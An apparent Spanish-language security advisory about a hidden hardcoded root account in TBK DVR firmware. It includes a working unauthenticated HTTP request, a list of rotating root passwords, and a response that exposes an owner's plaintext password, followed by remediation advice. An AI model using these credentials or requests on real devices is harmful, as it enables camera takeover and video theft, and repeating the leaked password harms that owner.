[TBK DVR] Backdoor: Cuenta root permite acceso de administrador. ( +Contraseña rota ) - CVE-2026-####

El dispositivo incorpora una segunda cuenta de administrador, root, con la contraseña ( mayormente se encuentra la contraseña 199509, pero tambien se puedne identificar otras ) que no aparece en la interfaz web (la lista de usuarios la filtra explícitamente). El acceso con root/199509 es válido y otorga privilegios de administrador, constituyendo una puerta trasera: aunque el dueño cambie la contraseña de admin, la cuenta root permanece activa y no se puede ver, modificar ni eliminar desde la UI.
Componente afectado:
Endpoint / mecanismo:
GET /device.rsp?opt=user&cmd=listconCookie: uid=rootyPOST /logincheck.rsp?type=1Stack / versión: firmware
T2017040635_V01; filtrado enUserManager.js(if(uid=="root"){continue;})Precondición: ninguna (el valor de
uidse fija arbitrariamente; el login acepta la credencial fija)
Credenciales / contexto de prueba: acceso remoto no autenticado.
Unico paso — Descubrir la cuenta oculta:

.
Check automatizado

Verificacion:

.

.
Update:
Pude evidencidenciar que las contraseñas identificadas para el usuario "root" van rotando :
"075939"
"199509"
"222749"
"232752"
"245867"
"262132"
"295276"
"339313"
"559502"
"617433"
"737550"
"840985"
"963569"- URL
- http://192.168.0.101:85/device.rsp?opt=user&cmd=list
- Endpoint
- GET /device.rsp
- Parameter
- opt=user&cmd=list
GET /device.rsp?opt=user&cmd=list HTTP/1.1
Host: 192.168.0.101
Cookie: uid=root
User-Agent: Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)
Accept: */*
Connection: close
HTTP/1.0 200 OK
Content-type: text/html; charset=UTF-8
Server: GNU rsp/1.0
Content-Language: en
Expires: -1
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: private, max-age=0
Connection: close
Date: Sun, 20 Sep 2026 01:24:05 GMT
{
"result": 0,
"list": [
{
"uid": "root",
"pwd": "075939",
"role": 2,
"enmac": 0,
"mac": "00:00:00:00:00:00",
"playback": 4294967295,
"view": 4294967295,
"rview": 4294967295,
"ptz": 4294967295,
"backup": 4294967295,
"opt": 4294967295
},
{
"uid": "barcasa",
"pwd": "Carcarazza79@",
"role": 2,
"enmac": 0,
"mac": "00:00:00:00:00:00",
"playback": 4294967295,
"view": 4294967295,
"rview": 4294967295,
"ptz": 4294967295,
"backup": 4294967295,
"opt": 4294967295
}
]
}Account takeover persistente y no detectable por el usuario:
acceso administrativo total
exfiltración de vídeo
modificación de configuración
Actualizar a la ultima version estable disponible, la cual deberia poder cubrir minimamente:
Eliminar la cuenta
roothardcodeada (o exigir un secreto único por dispositivo / primer arranque).No ocultar cuentas del listado de usuarios: si una cuenta existe, debe ser visible y gestionable.
Rotar la credencial en todos los dispositivos afectados.
More from @CapitanAlfa
[TBK DVR ] Command injection sin autenticación permite RCE como root - CVE-2024-3721
El protocolo rsp expone un comando obfuscado device.rsp?opt=sys&cmd= S O S T R E A MAX (decodifica a streamax ) cuyo parámetro mdc se concatena en una llamada a system() sin sanitizar . El filtro de saneamiento bloquea ; , | , & y > , pero no la sustitución…
[DVR TBK] bypass de autenticación en DVR (multi vendor ) - CVE-2018-9995
El endpoint device.rsp?opt=user&cmd=list del protocolo rsp devuelve la lista de usuarios con sus contraseñas en texto claro cuando la petición incluye la cookie Cookie: uid=admin , sin requerir una sesión válida . Un atacante remoto no autenticado obtiene…


Comments
0